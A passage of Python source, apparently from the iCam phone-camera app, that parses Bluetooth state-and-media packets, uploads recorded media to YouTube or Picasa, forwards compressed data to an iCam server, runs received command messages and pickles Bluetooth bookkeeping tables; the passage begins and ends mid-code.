    stateMediaData: the raw packet bytes; fileName: the media file name,
    whose 5th-from-last character encodes the camera id.
    Returns a tuple (cameraId, (tm_year, tm_mon, tm_mday, tm_hour, tm_min,
    tm_sec, numMilliseconds), btClientMACAddr, aBatteryLevel,
    aChargerStatus), or None on any error. Also updates the global
    btMsgStateTime as a side effect of the struct.unpack below.
    """
    global deviceIdFormat, btMsgStateTime
    global statePackFormat00, statePackFormat01, statePackFormat02, \
        statePackFormat03
    try:
        # The digit before the extension dot encodes the camera id.
        cameraId = int(fileName[len(fileName) - 5])
        """
        We want the time when the movie was recorded (and
        uploaded via BT on the server),
        NOT the upload time of the server.
        """
        #crtTime = GetCurrentDateTime()
        # We get the time the file was uploaded from the state.
        #statePackFormat03_1 = statePackFormat03[1:]
        statePackFormat03_1 = statePackFormat03[1:] + statePackFormat03b[1:]
        if NEW_BT_FORMAT:
            """
            Note: we require the little endian sign "<" before the other format
            strings.
            """
            statePackFormatPartial = "<" + statePackFormat00[1:] + \
                statePackFormat01[1:] + statePackFormat02[1:]
            statePackFormatPartial2 = "<" + statePackFormat00[1:] + \
                statePackFormat01[1:]
        else:
            """
            Note: we require the little endian sign "<" before the other
            format strings
            - that is why we have the "<" in the deviceIdFormat string
            """
            statePackFormatPartial = deviceIdFormat + statePackFormat00[1:] + \
                statePackFormat01[1:] + statePackFormat02[1:]
        if NEW_BT_FORMAT:
            # New format: the state trailer sits at the END of the packet.
            offset = len(stateMediaData) - struct.calcsize(statePackFormat)
            offset2 = len(stateMediaData) - struct.calcsize(statePackFormat)
        else:
            offset = 0
            offset2 = 0
        DebugPrint("GetInfoFromSMFBtMsg(): offset " \
            "(where iCam state data begins) = %d (0x%x)" % (offset, offset))
        offset += struct.calcsize(statePackFormatPartial)
        offset2 += struct.calcsize(statePackFormatPartial2)
        DebugPrint("GetInfoFromSMFBtMsg(): " \
            "offset = %d (0x%x), offset2 = %d." % \
            (offset, offset, offset2))
        """
        DebugPrint("BluetoothMessageProcess:" \
            "UploadBluetoothMediaToGoogle(): " \
            "statePackFormat03_1 = %s, " \
            "calcsize() = %d." % \
            (statePackFormat03_1,
                struct.calcsize(
                    statePackFormatPartial)))
        #DebugPrint("BluetoothMessageProcess:" \
        #    "UploadBluetoothMediaToGoogle(): " \
        #    "tm_year = %s" % str(tm_year))
        """
        (tm_year, tm_mon, tm_mday,
            tm_hour, tm_min, tm_sec,
            numMilliseconds,
            btMsgStateTime, _, _) = \
            struct.unpack(statePackFormat03_1,
                stateMediaData[offset : offset + \
                    struct.calcsize(statePackFormat03_1)])
        statePackFormat02_1 = statePackFormat02[1:]
        btAddr = [0, 0, 0, 0, 0, 0]
        (_, btAddr[0], btAddr[1], btAddr[2], btAddr[3], btAddr[4], btAddr[5],
            _ , _) = struct.unpack(statePackFormat02_1,
            stateMediaData[offset2 : offset2 + \
                struct.calcsize(statePackFormat02_1)])
        # Render the 6 address bytes as a colon-separated MAC string.
        btCliendMACAddrList = ["%02X:" % e for e in btAddr]
        btCliendMACAddr = "".join(btCliendMACAddrList)
        btCliendMACAddr = btCliendMACAddr[: len(btCliendMACAddr) - 1]
        timeTuple = (tm_year, tm_mon, tm_mday, tm_hour, tm_min, tm_sec,
            numMilliseconds)
        DebugPrint("GetInfoFromSMFBtMsg(): cameraId = %d, " \
            "tm_year = %d, tm_mon = %d, tm_mday = %d, " \
            "tm_hour = %d, tm_min = %d, tm_sec=%d, numMilliseconds=%d, " \
            "btMsgStateTime = %d." % \
            (cameraId,
                tm_year, tm_mon, tm_mday,
                tm_hour, tm_min, tm_sec, numMilliseconds,
                btMsgStateTime))
        offset3 = offset + struct.calcsize(statePackFormat03_1)
        statePackFormatPartial += statePackFormat03_1
        statePackFormat04_1 = statePackFormat04[1:]
        aStr = stateMediaData[offset3 : offset3 + \
            struct.calcsize(statePackFormat04)]
        DebugPrint("GetInfoFromSMFBtMsg(): " \
            "struct.calcsize(statePackFormat04) = %d, " \
            "len(aStr) = %d." % \
            (struct.calcsize(statePackFormat04), len(aStr)))
        (aBatteryLevel, _, _, _, _, aChargerStatus) = \
            struct.unpack(statePackFormat04, aStr)
        DebugPrint("GetInfoFromSMFBtMsg(): " \
            "aBatteryLevel = %d, aChargerStatus = %d." % \
            (aBatteryLevel, aChargerStatus))
        return (cameraId, timeTuple, btCliendMACAddr, \
            aBatteryLevel, aChargerStatus)
    except:
        DebugPrintErrorTrace()
        return None
def GetMediaFromBluetoothSMFPacket(stateMediaData):
    """Strip the iCam device-id + state bytes from a BT SMF packet and
    return only the embedded media payload (None on error).
    """
    try:
        stateLen = struct.calcsize(deviceIdFormat) + \
            struct.calcsize(statePackFormat)
        if NEW_BT_FORMAT:
            # New format: the state trailer sits at the END of the packet.
            mediaData = stateMediaData[: -stateLen]
        else:
            # Old format: the state header sits at the BEGINNING.
            mediaData = stateMediaData[stateLen:]
        DebugPrint("GetMediaFromBluetoothSMFPacket(): " \
                    "len(stateMediaData) = %d, " \
                    "lenNonMediaData = %d, " \
                    "len(mediaData) = %d." % \
                    (len(stateMediaData), stateLen, len(mediaData)))
        return mediaData
    except:
        DebugPrintErrorTrace()
def UploadBluetoothMediaToGoogle(stateMediaData, fileName,
        fileNameExtensionList, uploadFunction, btClientDeviceId,
        aBatteryLevel=-1, aChargerStatus=-1):
    """Dump the media payload of a Bluetooth SMF packet to a temp file and
    upload it to Google on a worker thread.

    stateMediaData: full SMF packet (state + media) as received over BT.
    fileName: media file name; its LAST 4 chars are taken as the extension.
    fileNameExtensionList: extensions handled by uploadFunction (e.g.
        [".3gp", ".mp4"] for YouTube) - other extensions are skipped.
    uploadFunction: e.g. YouTubeVideoUpload or PicasaPhotoUpload.
    aBatteryLevel, aChargerStatus: forwarded to uploadFunction; -1 = unknown.
    """
    fileNameExtension = str.lower(fileName[len(fileName) - 4:])
    #TODO!!!!!!!!: takeout this info and pass it directly to UploadBluetoothMediaToGoogle()
    res = GetInfoFromSMFBtMsg(stateMediaData, fileName)
    if res is None:
        # Could not parse the state part of the packet - nothing to upload.
        return
    cameraId = res[0]
    (tm_year, tm_mon, tm_mday,
        tm_hour, tm_min, tm_sec, numMilliseconds) = res[1]
    DebugPrint("Entered UploadBluetoothMediaToGoogle().")
    #DebugPrint("len(fileName) =", len(fileName))
    DebugPrint("UploadBluetoothMediaToGoogle(): len(stateMediaData) = %d" % \
        len(stateMediaData))
    if fileNameExtension in fileNameExtensionList:
        DebugPrint("UploadBluetoothMediaToGoogle(): uploading.")
        #DebugPrint("len(fileName) = %d" % len(fileName))
        fOutput = None
        try:
            """
            # Unfortunately time.mktime() DOES NOT WORK ON
            # PyS60 2.0. It simply crashes it without an
            # exception...
            #From http://www.tutorialspoint.com/python/time_mktime.htm
            # The last 3 args are tm_wday, tm_yday,tm_isdst
            btMediaTime = time.localtime(time.mktime(
                (tm_year, tm_mon, tm_mday, tm_hour, tm_min,
                tm_sec, -1, -1, -1) ))
            """
            # btMediaTimeStr = "%02d:%02d:%02d.%03d " \
            #     "%02d-%02d-%04d" % (tm_hour, tm_min,
            #     tm_sec, numMilliseconds, tm_mday, tm_mon,
            #     tm_year)
            # Timestamp string; milliseconds are rounded to one decisecond
            # digit by int((ms + 50) / 100).
            btMediaTimeStr = "%02d:%02d:%02d.%01d %02d-%02d-%04d" % \
                (
                tm_hour, tm_min, tm_sec,
                int((numMilliseconds + 50) / 100),
                tm_mday, tm_mon, tm_year
                )
            btMediaDateStr = "%04d-%02d-%02d" % (tm_year, tm_mon, tm_mday)
            DebugPrint("UploadBluetoothMediaToGoogle(): " \
                "btMediaTimeStr = %s, btMediaDateStr = %s." % \
                (btMediaTimeStr, btMediaDateStr))
            #DebugPrint("len(fileName) = %d" % len(fileName))
            #pathFileName = "D:/" + fileName
            # Temp file holding only the media payload, read back by the
            # upload function on the worker thread.
            pathFileName = LOCAL_FOLDER_TEMP + "/" + fileName
            fOutput = open(pathFileName, "wb")
            mediaData = GetMediaFromBluetoothSMFPacket(stateMediaData)
            DebugPrint("UploadBluetoothMediaToGoogle(): " \
                "len(mediaData) = %d." % \
                len(mediaData))
            fOutput.write(mediaData)
            # !!!!CHANGED
            #!!!!!!!!!!!!!!!!!!!!!!!UNDERSTAND WHY DIDN'T I PUT close() here, but in MyThreadUploadFunction() - I'm not using fOutput in Youtube/PicassaUpload(). But I can use it in YouTubeVideoUpload() - both use FileObjectBufferWithLenForGdataMedia()
            """
            fOutput.close() is required here since I read the file
            in MyThreadUploadFunction() - on Nokia this was not really a problem since LOCAL_FOLDER_TEMP was a RAM drive.
            !!!!If we want to avoid creating files completely, we can pass mediaData as parameter to YouTubeVideoUpload() and Picasa...Upload().
            """
            fOutput.close()
            """
            uploadFunction(pathFileName, fileName, \
                btClientDeviceId, crtTime, \
                btClientDeviceId, cameraId)
            """
            # Worker-thread body; closes over pathFileName, fileName,
            # btMediaTimeStr/btMediaDateStr, cameraId, battery/charger vars.
            def MyThreadUploadFunction():
                uploadFunction(pathFileName, fileName, btClientDeviceId, None,
                    btMediaTimeStr, btMediaDateStr,
                    btClientDeviceId, cameraId,
                    aBatteryLevel, aChargerStatus)
                if fOutput is not None:
                    try:
                        #fOutput.close()
                        DebugPrint("MyThreadUploadFunction(): " \
                            "file size uploaded = %d." % \
                            os.path.getsize(pathFileName))
                    except:
                        DebugPrintErrorTrace()
                try:
                    pass
                    #!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Uncomment os.unlink() or do move
                    os.unlink(pathFileName)
                except:
                    # Maybe the file got moved since
                    # uploading to Google failed.
                    DebugPrintErrorTrace()
                    DebugPrint("UploadBluetoothMediaToGoogle(): " \
                        "file size uploaded = %d." % \
                        os.path.getsize(pathFileName))
            # This is to make the UI more responsive (on Nokia phones, etc)
            MyThreadStart(MyThreadUploadFunction)
            #MyThreadUploadFunction()
        except IOError:
            DebugPrintErrorTrace()
            """
            We assume we obtain exception:
            "IOError: [Errno 28] No space left on " \
            "device: 'D:/2011_04_25_23_17_39_032_0.3gp'"
            This is probably related to the fact YouTube
            upload did not succeed and the video file
            in LOCAL_FOLDER_TEMP was not erased
            probably because it was hanged by the
            YouTube API.
            """
            RestartPhone()
        except:
            DebugPrintErrorTrace()
        """
        # Doesn't work on Python 2.2 (e.g., PyS60 1.4.5)
        finally:
            try:
                fOutput.close()
            except:
                DebugPrintErrorTrace()
            try:
                os.unlink(pathFileName)
            except:
                DebugPrintErrorTrace()
        """
def BluetoothMessageProcessTXT(btMsgId, btMsgData,
        fileNameBtMsg, btClientDeviceId):
    """Handle a TXT Bluetooth message: derive the target file name, upload
    the payload to the Unsent queue, then delete the BT message.

    In the new BT format the payload already carries a deviceId header and
    is zlib-compressed here before upload; in the old format only the
    4-byte size header is stripped.
    """
    DebugPrint("BluetoothMessageProcessTXT(btMsgId = %s): Processing a text " \
        "message from btClientDeviceId = %s of len(btMsgData) = %d, " \
        "fileNameBtMsg = %s - saving it in the Unsent folder." % \
        (btMsgId, btClientDeviceId, len(btMsgData), fileNameBtMsg))
    """
    fOutput = open(LOCAL_FOLDER_MEDIA_FILES + "/" + fileNameBtMsg +\
        "_before.dgb", "wb")
    fOutput.write(btMsgData)
    fOutput.close()
    """
    try:
        if NEW_BT_FORMAT:
            # Drop the OBEX prefix and the ".txt" OBEX extension, then
            # append the iCam text-message extension.
            #fileName = fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX): ]
            fileName = fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX): \
                -len(BT_OBEX_EXTENSION_TXT)] + \
                EXTENSION_TEXT_MESSAGE
        else:
            # Old format: skip prefix + type marker instead.
            fileName = fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX) + \
                len(BT_OBEX_FILENAME_PREFIX_TYPE_TXT):] + \
                EXTENSION_TEXT_MESSAGE
        """
        fileName = time.strftime("%Y_%m_%d_%H_%M_%S_",
            GetCurrentDateTime()) + EXTENSION_TEXT_MESSAGE
        """
        DebugPrint("BluetoothMessageProcessTXT(): fileName = %s." % fileName)
        if NEW_BT_FORMAT:
            """
            # ~Deprecated
            # We add the footer "data-link layer" packet info as header to be an Internet packet.
            lenExtra = struct.calcsize(deviceIdFormat)
            dataToSend = btMsgData[-lenExtra : ] + \
                btMsgData[ : -lenExtra]
            """
            dataToSend = btMsgData
            """
            fOutput = open(LOCAL_FOLDER_MEDIA_FILES + "/" + \
                fileNameBtMsg + "_after.dgb", "wb")
            fOutput.write(dataToSend)
            fOutput.close()
            """
            """
            The packet dataToSend == btMsgData ALREADY has a
            "data-link layer" 100-bytes-long header
            with deviceId, followed by the "payload" text message.
            Therefore to obtain a packet to send to the iCam server
            we only need to zlib-compress the packet.
            """
            # Python 2 codec: zlib-compress via str.encode("zlib").
            dataToSend = dataToSend.encode("zlib")
            UploadUnsentBinaryData(btClientDeviceId, fileName, dataToSend)
        else:
            """
            fOutput = open(pathName + "/" + fileName, "wb")
            fOutput.write(btMsgData[4 : ])
            fOutput.close()
            """
            # Old format: strip the 4-byte size header; payload is already
            # compressed (see BluetoothMessageProcessAndDelete()).
            UploadUnsentBinaryData(btClientDeviceId, fileName, btMsgData[4:])
        # bluetoothInbox.delete(btMsgId)
        BluetoothDeleteMessage(btMsgId)
    except:
        DebugPrintErrorTrace()
def BluetoothMessageProcessFIL(btMsgId, btMsgData,
        fileNameBtMsg, btClientDeviceId):
    """Handle a FIL (arbitrary file) Bluetooth message.

    Derives the target file name from the OBEX file name, hands the payload
    to UploadUnsentBinaryData(), then deletes the BT message. Failures are
    only logged (bare except, per file convention).
    """
    # """
    DebugPrint("BluetoothMessageProcessFIL(): Processing a file message " \
        "from %s - saving it in the Unsent folder." % btClientDeviceId)
    # """
    try:
        if NEW_BT_FORMAT:
            # New format: just strip the iCam OBEX prefix and ship the
            # whole message body.
            fileName = fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX): ]
            payload = btMsgData
        else:
            # Old format: skip prefix + type marker, drop the 4-byte size
            # header from the payload.
            # NOTE(review): this reuses the TXT type-prefix constant;
            # presumably all type prefixes have equal length - confirm.
            fileName = fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX) + \
                len(BT_OBEX_FILENAME_PREFIX_TYPE_TXT):] + \
                EXTENSION_ARBITRARY_FILE
            payload = btMsgData[4:]
        UploadUnsentBinaryData(btClientDeviceId, fileName, payload)
        # bluetoothInbox.delete(btMsgId)
        BluetoothDeleteMessage(btMsgId)
    except:
        DebugPrintErrorTrace()
def BluetoothMessageProcessSMF(btMsgId, btMsgData, stateMediaData,
        fileNameBtMsg, btClientDeviceId,
        aBatteryLevel=-1, aChargerStatus=-1):
    """Handle an SMF (state + media file) Bluetooth message.

    Extracts the media file name from the packed state, optionally uploads
    the media to YouTube/Picasa, optionally archives it locally, forwards
    state (and possibly media) to the iCam server depending on
    useiCamServer, and finally deletes the BT message.
    """
    DebugPrint(
        "Entered BluetoothMessageProcessSMF(btMsgId=%s, btMsgData, " \
        "stateMediaData of len %d, fileNameBtMsg=%s, btClientDeviceId=%s, " \
        "aBatteryLevel=%d, aChargerStatus=%d)." % \
        (btMsgId, len(stateMediaData), fileNameBtMsg, btClientDeviceId,
        aBatteryLevel, aChargerStatus))
    """
    fOutput = open(LOCAL_FOLDER_MEDIA_FILES + "/" + fileNameBtMsg + ".dgb", "wb")
    fOutput.write(stateMediaData)
    fOutput.close()
    """
    try:
        """
        # Write on mem card temporary file from received BT.
        # We need to do this only for debugging purposes - so better
        # comment all this block if not needed.
        tmpPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + \
            BT_OBEX_FILENAME_PREFIX + "_rcvd"
        fOutput = open(tmpPathFileName, "wb")
        fOutput.write(btMsgData)
        fOutput.close()
        """
        #ReceiveArchivedFile()
        #stateMediaData = bluetoothFD.read(1000000)
        #appuifw.note(u"ReceiveArchivedFile: read %d bytes." %
        #    (fileDataSize + 4), "info")
        #fOutput = open("bla_tmp_after", "wb")
        #fOutput.write(stateMediaData)
        #fOutput.close()
        """
        TODO!!!!: should I declare gpsInfo as global? Why am I
        actually clearing gpsInfo?
        gpsInfo = {"position": {}, "course": {}, "satellites": {}}
        """
        """
        Since I only want to obtain fileName, I extract it directly
        without unpack().
        """
        if NEW_BT_FORMAT:
            # We compute the offset to the fileName in the iCam state
            #offset = len(stateMediaData) - struct.calcsize(statePackFormat) + 1408
            """
            # These 2 cancel:
            offset = len(stateMediaData) - \
                struct.calcsize(statePackFormat) + \
                struct.calcsize(statePackFormat) - \
                struct.calcsize(statePackFormat26) - \
                struct.calcsize(statePackFormat27)
            """
            # fileName field (statePackFormat26) sits near the end of the
            # state footer, before the 27 and 28 sub-structs.
            offsetFileName = len(stateMediaData) - \
                struct.calcsize(statePackFormat26) - \
                struct.calcsize(statePackFormat27) - \
                struct.calcsize(statePackFormat28)
            #fileName = stateMediaData[offset: offset + 256] #+ "_" + btClientDeviceId + cameraId
            fileName = stateMediaData[offsetFileName: offsetFileName + \
                struct.calcsize(statePackFormat26)]
        else:
            # Fixed byte offset of the fileName field inside the old-format
            # state header.
            OFFSET_FILENAME_IN_STATE = 1408
            fileName = stateMediaData[struct.calcsize(deviceIdFormat) + \
                OFFSET_FILENAME_IN_STATE : struct.calcsize(deviceIdFormat) + \
                OFFSET_FILENAME_IN_STATE + 256]
        # The field is NUL-padded; keep only the part before the first NUL.
        firstNullCharIndex = fileName.find("\x00")
        fileName = fileName[0 : firstNullCharIndex]
        DebugPrint("BluetoothMessageProcessSMF(): fileName " \
            "(from state) = %s." % fileName)
        #DebugPrint("len(fileName) = %d" % len(fileName))
        """
        if not os.path.exists(LOCAL_FOLDER_UNSENT_FILES):
            os.makedirs(LOCAL_FOLDER_UNSENT_FILES)
        pathName = LOCAL_FOLDER + "/" + btClientDeviceId
        if not os.path.exists(pathName):
            os.makedirs(pathName)
        pathName = LOCAL_FOLDER + "/" + btClientDeviceId + "/Unsent"
        if not os.path.exists(pathName):
            os.makedirs(pathName)
        """
        if uploadMediaToYouTube or uploadMediaToPicasa:
            """
            Note that UploadBluetoothMediaToGoogle() creates a separate thread
            to handle the Google upload. This is OK, since we create the
            file to be uploaded before entering the thread and delete it
            in the thread, when we finish.
            """
            if uploadMediaToYouTube:
                UploadBluetoothMediaToGoogle(stateMediaData, fileName,
                    [".3gp", ".mp4"], YouTubeVideoUpload, btClientDeviceId,
                    aBatteryLevel, aChargerStatus) #-1, -1)
            """
            SleepAndPetWatchdog(pauseIntervalGdata)
            """
            if uploadMediaToPicasa:
                UploadBluetoothMediaToGoogle(stateMediaData, fileName,
                    [".jpg", ".png"], PicasaPhotoUpload, btClientDeviceId)
            """
            SleepAndPetWatchdog(pauseIntervalGdata)
            """
        if not ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ:
            # Store the media file from the Bluetooth received message.
            pathName = LOCAL_FOLDER_MEDIA_FILES + "/" + btClientDeviceId
            if not os.path.exists(pathName):
                os.makedirs(pathName)
            # !!!!CHANGED
            # We create a new file since the one created before was in LOCAL_FOLDER_TEMP - normally no need to move the file
            mediaData = GetMediaFromBluetoothSMFPacket(stateMediaData)
            fOutput = open(pathName + "/" + fileName, "wb")
            fOutput.write(mediaData)
            fOutput.close()
        if NEW_BT_FORMAT:
            pass
        else:
            """
            if (fileName[len(fileName) - 4 : ] == ".jpg") or
                (fileName[len(fileName) - 4 : ] == ".3gp"):
            """
            # Could be ".3gp", ".jpg", ".png", etc.
            # Replace a 4-char media extension with the SMF extension.
            if fileName[len(fileName) - 4] == ".":
                fileName = fileName[:len(fileName) - 4] + \
                    EXTENSION_STATE_AND_MEDIA_FILE
        # Size of the deviceId + state block appended/prepended to media.
        lenNonMediaData = struct.calcsize(deviceIdFormat) + \
            struct.calcsize(statePackFormat)
        # Note that we consider the iCam server the BT proxy
        if useiCamServer == 2:
            # Forward state AND media to the iCam server.
            if NEW_BT_FORMAT:
                fileName = fileName[ : -4] + EXTENSION_STATE_AND_MEDIA_FILE
                # Move the footer in front so the packet matches the
                # Internet packet layout (header first).
                SMFData = stateMediaData[-lenNonMediaData : ] + \
                    stateMediaData[ : -lenNonMediaData]
                """
                fOutput = open(LOCAL_FOLDER_UNSENT_FILES + "/" + fileName + "2.dbg", "wb")
                fOutput.write(SMFData)
                fOutput.close()
                """
                SMFData = SMFData.encode("zlib")
                UploadUnsentBinaryData(btClientDeviceId, fileName, SMFData)
            else:
                #btMsgData[4:] is the SMF packet, compressed. stateMediaData is btMsgData[4:].decode("zlib")
                UploadUnsentBinaryData(btClientDeviceId, fileName,
                    btMsgData[4:])
        elif useiCamServer == 1:
            # Forward ONLY the state block to the iCam server.
            """
            # We send ONLY THE STATE data from the Bluetooth message,
            # to the iCam Server
            stateData = stateMediaData[struct.calcsize(deviceIdFormat) : \
                struct.calcsize(deviceIdFormat) + \
                struct.calcsize(statePackFormat)]
            """
            if NEW_BT_FORMAT:
                fileName = fileName[ : -4] + EXTENSION_STATE_AND_MEDIA_FILE
                stateData = stateMediaData[-lenNonMediaData : ]
            else:
                stateData = stateMediaData[0: lenNonMediaData]
            stateDataCompressed = stateData.encode("zlib")
            UploadUnsentBinaryData(btClientDeviceId, fileName,
                stateDataCompressed)
        # """
        if uploadMediaToYouTube or uploadMediaToPicasa:
            """
            Wait less if useiCamServer and size of packet
            is big (e.g., 50-200KB).
            """
            SleepAndPetWatchdog(pauseIntervalGdata)
        # """
        """
        fOutput = open(pathName + "/" + fileName, "wb")
        fOutput.write(btMsgData[4 : ])
        fOutput.close()
        """
        """
        firstNullCharIndex = accessPointName.find("\x00")
        accessPointName = accessPointName[0 : firstNullCharIndex]
        #print "len(fileName) =", len(fileName)
        accessPointName = unicode(accessPointName)
        """
        # appuifw.note(u"Wrote received file %s." % fileName, "info")
        # bluetoothServerTimer.after(1, \
        #     BluetoothMessageListProcessWrapper(bluetoothFD))
        # bluetoothInbox.delete(btMsgId)
        BluetoothDeleteMessage(btMsgId)
        """
        !!!!If we receive "SymbianError: [Errno -14] KErrInUse"
        (see http://mobile-revival.110mb.com/ReVival/N95N95N95N95N95/FromPhone/stderr_2011_06_13_10_02_41.txt)
        try to Quit() or restart phone
        """
    except:
        DebugPrintErrorTrace()
def BluetoothMessageProcessCMD(btMsgId, btMsgData, aData,
        fileNameBtMsg, btClientDeviceId):
    """Handle a CMD Bluetooth message: delete it, back up the command
    string to a timestamped file, then execute the commands.
    """
    DebugPrint("Entered BluetoothMessageProcessCMD(btMsgId=%s, btMsgData of " \
        "len %d, aData of len %d, fileNameBtMsg=%s, btClientDeviceId=%s." % \
        (btMsgId, len(btMsgData), len(aData), fileNameBtMsg, btClientDeviceId))
    # Delete the BT message BEFORE ExecuteCommands(): a command may trigger
    # RestartPhone(), so we would never get to delete it afterwards.
    # bluetoothInbox.delete(btMsgId)
    BluetoothDeleteMessage(btMsgId)
    # Normally only BT clients should receive BT messages, but for testing
    # the BT server (mode 1) is allowed to process CMD messages as well.
    if bluetoothMode in (2, 1):
        # Strip the leading deviceId header from the command payload;
        # identical slicing for both old and new BT formats.
        cmdString = aData[struct.calcsize(deviceIdFormat): ]
        """
        DebugPrint("BluetoothMessageProcessCMD(): cmdString = %s" % cmdString)
        """
        # Keep a timestamped backup file of the commands received.
        backupName = COMMANDS_FILENAME + \
            GetCurrentDateTimeStringWithMilliseconds()
        backupFile = open(LOCAL_FOLDER + "/" + backupName, "wb")
        backupFile.write(cmdString)
        backupFile.close()
        ExecuteCommands(cmdString)
# pickle is used by LoadBtMsgMostRecentTime()/StoreBtMsgMostRecentTime()
# to persist the BT bookkeeping tables.
if not (SYMBIAN_S60_OS and (_PyS60_1_9_OR_NEWER == False)):
    # Python 2.2 doesn't have the pickle module
    try:
        import pickle
    except:
        DebugPrintErrorTrace()
#if SYMBIAN_OS:
#BT_MAP_FILENAME = LOCAL_FOLDER_TEMP + "/BT_map.pkl"
# Path of the pickle file persisting btMsgMostRecentTime and btAddrTable.
BT_MAP_FILENAME = LOCAL_FOLDER + "/BT_map.pkl"
def LoadBtMsgMostRecentTime():
    """Restore btMsgMostRecentTime and btAddrTable from BT_MAP_FILENAME.

    No-op when the file is missing or on PyS60 older than 1.9 (Python 2.2
    has no pickle module). Errors are logged, never raised.
    """
    global btMsgMostRecentTime, btAddrTable
    if SYMBIAN_S60_OS and _PyS60_1_9_OR_NEWER == False:
        """
        Python 2.2 doesn't have the pickle module.
        Anyhow we hope not to use it for iCam BT server.
        """
        return
    fInput = None
    try:
        if not os.path.isfile(BT_MAP_FILENAME):
            return
        # Inspired from second example at
        # http://docs.python.org/library/pickle.html at 11.1.7:
        fInput = open(BT_MAP_FILENAME, "rb")
        # The two tables were dumped in exactly this order by
        # StoreBtMsgMostRecentTime().
        btMsgMostRecentTime = pickle.load(fInput)
        btAddrTable = pickle.load(fInput)
        fInput.close()
        DebugPrint("LoadBtMsgMostRecentTime(): btMsgMostRecentTime = %s, " \
            "btAddrTable = %s" % \
            (str(btMsgMostRecentTime), str(btAddrTable)))
    except:
        try:
            if fInput is not None:
                fInput.close()
        except:
            DebugPrintErrorTrace()
        DebugPrintErrorTrace()
def StoreBtMsgMostRecentTime():
    """Persist btMsgMostRecentTime and btAddrTable to BT_MAP_FILENAME.

    No-op on PyS60 older than 1.9 (Python 2.2 has no pickle module).
    Errors are logged, never raised.
    """
    if SYMBIAN_S60_OS and _PyS60_1_9_OR_NEWER == False:
        """
        Python 2.2 doesn't have the pickle module.
        Anyhow we hope not to use it for iCam BT server.
        """
        return
    fOutput = None
    try:
        # Inspired from first example at
        # http://docs.python.org/library/pickle.html at 11.1.7:
        fOutput = open(BT_MAP_FILENAME, "wb")
        # Pickle using protocol 0; LoadBtMsgMostRecentTime() reads the two
        # tables back in the same order.
        pickle.dump(btMsgMostRecentTime, fOutput)
        pickle.dump(btAddrTable, fOutput)
        fOutput.close()
    except:
        try:
            if fOutput is not None:
                fOutput.close()
        except:
            DebugPrintErrorTrace()
        DebugPrintErrorTrace()
"""
Dictionary with key (deviceId, cameraId) and
value media time (time.mktime() or tuple, depending on the OS).
"""
btMsgMostRecentTime = {}
"""
Dictionary holding for a BT server iCam phone
the key deviceId and value Bluetooth MAC address of all BT clients.
"""
btAddrTable = {}
"""
btMsgId is:
- for ANDROID_OS, WINDOWS_OS and SYMBIAN_3: a string representing the (filename) name of the BT msg
- for other SYMBIAN_OS: an integer ID for the messages from the BT Inbox.
"""
def BluetoothMessageProcessAndDelete(btMsgId, deleteMessageIfInvalid=False):
    """Validate, decode and dispatch one received Bluetooth message, then
    delete it from the inbox.

    btMsgId: message filename (Android/Windows/Symbian^3) or integer Inbox
        ID (other Symbian) - see the module comment above.
    deleteMessageIfInvalid: delete the message when decoding raises.
    Returns 0 on success, -1 on any error/invalid/stale message.
    """
    global bluetoothInbox
    global statePackFormat
    global btMsgList
    if ANDROID_OS or WINDOWS_OS or RASPBIAN_OS:
        """
        fIndex = btMsgId.rfind("/") #!!!!maybe \
        fileNameBtMsg = btMsgId[fIndex + 1:]
        pathFileNameBluetoothMessage = btMsgId
        """
        fileNameBtMsg = GetBluetoothMessageName(btMsgId)
        pathFileNameBluetoothMessage = GetBluetoothMessagePathFileName(btMsgId)
        sizeBluetoothMessage = os.path.getsize(pathFileNameBluetoothMessage)
        timeBluetoothMessage = GetTime()
        btMsgArrivalTime = -1
    elif SYMBIAN_OS:
        fileNameBtMsg = ""
        sizeBluetoothMessage = -1
        try:
            fileNameBtMsg = GetBluetoothMessageName(btMsgId)
            if SYMBIAN_3:
                #fileNameBtMsg = str(btMsgId)
                # NOTE(review): btMsgArrivalTime is not set on this branch;
                # str(btMsgArrivalTime) below relies on it - confirm.
                sizeBluetoothMessage = os.path.getsize( \
                    GetBluetoothMessagePathFileName(btMsgId))
            else:
                if S60_EDITION[0] >= 3:
                    try:
                        sizeBluetoothMessage = bluetoothInbox.size(btMsgId)
                    except:
                        DebugPrintErrorTrace()
                        #!!!!TODO check specifically for "SymbianError: [Errno -20] KErrCorrupt" and only then do BluetoothDeleteMessage
                        BluetoothDeleteMessage(btMsgId, True)
                        return -1
                # Get message time of arrival.
                btMsgArrivalTime = bluetoothInbox.time(btMsgId)
        except:
            DebugPrintErrorTrace()
    myText = "Entered BluetoothMessageProcessAndDelete(btMsgId = %s) on %s " \
        "(fileNameBtMsg = %s, " \
        "sizeBluetoothMessage = %d, btMsgArrivalTime = %s). " \
        "(Inbox has %d Bluetooth messages.)" % \
        (str(btMsgId), GetCurrentDateTimeStringNice(),
        fileNameBtMsg, sizeBluetoothMessage,
        str(btMsgArrivalTime),
        len(GetBluetoothInboxMessageList()))
    DebugPrint(myText)
    try:
        btMsgArrivalTimeStruct = time.localtime(btMsgArrivalTime)
        DebugPrint(
            " BluetoothMessageProcessAndDelete(): btMsgArrivalTimeStruct = " + \
            time.strftime("%Y_%m_%d_%H_%M_%S", btMsgArrivalTimeStruct))
    except:
        DebugPrintErrorTrace()
    ###########################################################################
    ###########################################################################
    ##########Now we have set fileNameBtMsg and sizeBluetoothMessage###########
    ###########################################################################
    ###########################################################################
    #!!!!TODO: Alex
    """
    if MY_DEBUG_UPLOAD_MSG:
        UploadGZippedData(deviceId, myText,
            ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
    """
    """
    print("message %s" % str(btMsgId))
    if bluetoothInbox.unread(btMsgId):
        print "unread"
    else:
        print "read"
    print("message type is %x" % bluetoothInbox.message_type(btMsgId))
    """
    try:
        DebugPrint("BluetoothMessageProcessAndDelete(): " \
            "fileNameBtMsg = %s." % fileNameBtMsg)
        # Check that the BT message is sent by an iCam client.
        if not fileNameBtMsg.startswith(BT_OBEX_FILENAME_PREFIX):
            DebugPrint("BluetoothMessageProcessAndDelete(): " \
                "fileNameBtMsg = %s does not start " \
